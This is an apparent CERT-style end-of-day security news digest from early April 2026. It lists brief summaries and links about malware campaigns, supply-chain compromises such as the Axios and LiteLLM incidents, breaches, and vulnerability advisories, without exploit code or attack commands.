---------------------------------------------
https://www.darkreading.com/remote-workforce/skull-vibrations-could-be-xr-h…
∗∗∗ Hackers Exploit CVE-2025-55182 to Breach 766 Next.js Hosts, Steal Credentials ∗∗∗
---------------------------------------------
A large-scale credential harvesting operation has been observed exploiting the React2Shell vulnerability as an initial infection vector to steal database credentials, SSH private keys, Amazon Web Services (AWS) secrets, shell command history, Stripe API keys, and GitHub tokens at scale.
---------------------------------------------
https://thehackernews.com/2026/04/hackers-exploit-cve-2025-55182-to.html
∗∗∗ They thought they were downloading Claude Code source. They got a nasty dose of malware instead ∗∗∗
---------------------------------------------
Source code with a side of Vidar stealer and GhostSocks. Tens of thousands of people eagerly downloaded the leaked Claude Code source code this week, and some of those downloads came with a side of credential-stealing malware.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2026/04/02/trojanized_c…
∗∗∗ New "Storm" infostealer steals credentials and is offered on the darknet ∗∗∗
---------------------------------------------
Security researchers at Varonis Threat Labs came across a new infostealer called "Storm" in early 2026. It is currently being traded among cybercriminals and can remotely collect session data from the currently most popular browsers (Google Chrome, Microsoft Edge and Mozilla Firefox).
---------------------------------------------
https://borncity.com/blog/2026/04/03/neuer-storm-infostealer-klaut-zugangsd…
∗∗∗ Weaponizing Trust Signals: Claude Code Lures and GitHub Release Payloads ∗∗∗
---------------------------------------------
A packaging error in Anthropic’s Claude Code npm release briefly exposed internal source code. This entry examines how threat actors rapidly weaponized the resulting attention, pivoting an existing AI-themed campaign to spread Vidar and GhostSocks.
---------------------------------------------
https://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-signals-cl…
∗∗∗ Axios Maintainer Confirms Social Engineering Attack Behind npm Compromise ∗∗∗
---------------------------------------------
On March 31, two malicious versions of Axios were briefly published to npm, introducing a dependency that installed a remote access trojan across macOS, Windows, and Linux. We covered the initial attack and its scope earlier, as well as a deeper technical analysis of its hidden blast radius and how dependency resolution expanded its impact exponentially. Now, the project’s lead maintainer has shared additional details about how the compromise occurred.
---------------------------------------------
https://socket.dev/blog/axios-maintainer-confirms-social-engineering-behind…
=====================
= Vulnerabilities =
=====================
∗∗∗ LWN: Security updates for Friday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1066236/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 01-04-2026 18:00 − Thursday 02-04-2026 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ NoVoice Android malware on Google Play infected 2.3 million devices ∗∗∗
---------------------------------------------
A new Android malware named NoVoice was found on Google Play, hidden in more than 50 apps that were downloaded at least 2.3 million times.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/novoice-android-malware-on-g…
∗∗∗ New EvilTokens service fuels Microsoft device code phishing attacks ∗∗∗
---------------------------------------------
A new malicious kit called EvilTokens integrates device code phishing capabilities, allowing attackers to hijack Microsoft accounts and provide advanced features for business email compromise attacks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-eviltokens-service-fuels…
∗∗∗ Hackers exploit TrueConf zero-day to push malicious software updates ∗∗∗
---------------------------------------------
Hackers have targeted TrueConf conference servers in attacks that exploit a zero-day vulnerability, allowing them to execute arbitrary files on all connected endpoints.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-exploit-trueconf-zer…
∗∗∗ Over 14,000 F5 BIG-IP APM instances still exposed to RCE attacks ∗∗∗
---------------------------------------------
Internet security watchdog Shadowserver has found over 14,000 BIG-IP APM instances exposed online amid ongoing attacks exploiting a critical-severity remote code execution (RCE) vulnerability.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-14-000-f5-big-ip-apm-in…
∗∗∗ Cyberattack on Hasbro: hackers infiltrate IT of major toy company ∗∗∗
---------------------------------------------
An attacker has penetrated Hasbro's IT environment. The toy manufacturer expects the cleanup to take several weeks.
---------------------------------------------
https://www.golem.de/news/cyberangriff-auf-hasbro-hacker-infiltrieren-it-vo…
∗∗∗ Hard to remove: Android malware distributed millions of times via Google Play ∗∗∗
---------------------------------------------
An Android malware distributed via the Google Play Store exploits old vulnerabilities to penetrate deep into the system. Users notice nothing of it.
---------------------------------------------
https://www.golem.de/news/nur-schwer-loeschbar-android-malware-millionenfac…
∗∗∗ CERT-UA Impersonation Campaign Spread AGEWHEEZE Malware to 1 Million Emails ∗∗∗
---------------------------------------------
The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed details of a new phishing campaign in which the cybersecurity agency itself was impersonated to distribute a remote administration tool known as AGEWHEEZE.
---------------------------------------------
https://thehackernews.com/2026/04/cert-ua-impersonation-campaign-spread.html
∗∗∗ Incident Report: LiteLLM/Telnyx supply-chain attacks, with guidance ∗∗∗
---------------------------------------------
This post will drill deeper into two recent supply chain exploits, targeting users of popular PyPI packages - litellm & telnyx. We also provide Python developers and maintainers with guidance on what they can do to prepare and protect themselves from future incidents.
---------------------------------------------
https://blog.pypi.org/posts/2026-04-02-incident-report-litellm-telnyx-suppl…
∗∗∗ European Commission cloud breach: a supply-chain compromise ∗∗∗
---------------------------------------------
In the interest of transparency, and in full agreement with the European Commission, CERT-EU is publishing this blog post to inform the wider community about a cybersecurity incident affecting the European Commission’s public website platform “europa.eu” hosted on Amazon Web Services (AWS) cloud infrastructure.
---------------------------------------------
https://cert.europa.eu/blog/european-commission-cloud-breach-trivy-supply-c…
∗∗∗ Police crime report statistics 2025: current developments in the area of "internet fraud" ∗∗∗
---------------------------------------------
A slight decline in reports, a modestly lower clearance rate, and a recommendation for Watchlist Internet. All of this can be found in the recently published police crime report statistics for the year 2025.
---------------------------------------------
https://www.watchlist-internet.at/news/polizeiliche-anzeigenstatistik-202/
∗∗∗ Beware of fake politicians: when the finance minister suddenly sends out investment tips ∗∗∗
---------------------------------------------
When criminals pose as well-known personalities, things can quickly become dangerous. Especially when it comes to supposedly exclusive investment opportunities.
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-fake-politiker-wenn-der-fina…
∗∗∗ The Invisible Army: Why IP Reputation Fails Against the Rotation Economy ∗∗∗
---------------------------------------------
Attackers route malicious traffic through ordinary home internet connections — and to a reputation feed, the source IP is indistinguishable from a legitimate user's connection. GreyNoise analyzed 4 billion sessions over 90 days and found that 39% of unique IPs targeting the edge come from residential address space. 78% vanish after just 1–2 sessions, before any reputation system can flag them.
---------------------------------------------
https://www.greynoise.io/blog/invisible-army-why-ip-reputation-fails-agains…
∗∗∗ vSphere and BRICKSTORM Malware: A Defender's Guide ∗∗∗
---------------------------------------------
Building on recent BRICKSTORM research from Google Threat Intelligence Group (GTIG), this post explores the evolving threats facing virtualized environments. These operations directly target the VMware vSphere ecosystem, specifically the vCenter Server Appliance (VCSA) and ESXi hypervisors.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/vsphere-brickstorm…
∗∗∗ You’re Not Supposed To ShareFile With Everyone (Progress ShareFile Pre-Auth RCE Chain CVE-2026-2699 & CVE-2026-2701) ∗∗∗
---------------------------------------------
If you squint and look at the CISA KEV list, you might think it's made up exclusively of vulnerabilities in file transfer solutions. While this would be wrong (and you shouldn’t squint, it’s bad for your eyes), file transfer solutions do play a decent role in the CISA KEV list due to how fondly threat actors, APT groups, and ransomware gangs alike perceive them.
---------------------------------------------
https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-pr…
∗∗∗ FBI Warns of AVrecon Malware Targeting Network Devices Across 163 Countries ∗∗∗
---------------------------------------------
The router sitting in your home office or small business did not need to be hacked by a skilled operator to end up serving as infrastructure for banking fraud, password attacks, and digital marketplace scams. All it needed was an unpatched vulnerability and a malware dubbed "AVrecon" to infect it and sell access to it within minutes. Last month, the FBI, alongside several international law enforcement agencies, took down the SocksEscort residential proxy service.
---------------------------------------------
https://thecyberexpress.com/fbi-warns-of-avrecon-malware/
∗∗∗ Vietnam-Linked PXA Stealer Campaign Exploits LinkedIn to Target Professionals Globally ∗∗∗
---------------------------------------------
A newly exposed global malware campaign reveals how PXA Stealer has been wielded by Vietnam‑linked actors to siphon sensitive data from professionals across multiple countries using trusted platforms like LinkedIn. First documented in late 2024, this campaign has evolved into a new threat that leverages social engineering, advanced payload delivery, and stealthy execution to outmaneuver traditional defenses.
---------------------------------------------
https://thecyberexpress.com/pxa-stealer-vietnam-linked-actors-linkedin/
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical Cisco IMC auth bypass gives attackers Admin access ∗∗∗
---------------------------------------------
Cisco has patched several critical and high-severity vulnerabilities, including an Integrated Management Controller (IMC) authentication bypass that enables attackers to gain Admin access.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-cisco-imc-auth-bypa…
∗∗∗ SAML SSO - Service Provider - Critical - Authentication bypass - SA-CONTRIB-2026-031 ∗∗∗
---------------------------------------------
This module enables you to perform SAML-protocol-based single-sign-on (SSO) on a Drupal site. The module doesn't sufficiently block access, leading to an authentication bypass vulnerability. Solution: Install the latest version.
---------------------------------------------
https://www.drupal.org/sa-contrib-2026-031
∗∗∗ XZ Utils 5.8.3: security update with unclear risk ∗∗∗
---------------------------------------------
The developers of the widely used XZ Utils have released an updated version that fixes security vulnerabilities.
---------------------------------------------
https://www.heise.de/news/XZ-Utils-5-8-3-Sicherheitsupdate-mit-unklarem-Ris…
∗∗∗ 200,000 WordPress Sites Affected by Arbitrary File Move Vulnerability in MW WP Form WordPress Plugin ∗∗∗
---------------------------------------------
On March 16th, 2026, we received a submission for an Arbitrary File Move vulnerability in MW WP Form, a WordPress plugin with more than 200,000 active installations. This vulnerability makes it possible for unauthenticated threat actors to move arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. This vulnerability can only be exploited if the "Saving inquiry data in database" option in the form settings is enabled.
---------------------------------------------
https://www.wordfence.com/blog/2026/04/200000-wordpress-sites-affected-by-a…
∗∗∗ LWN Security updates for Thursday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1066084/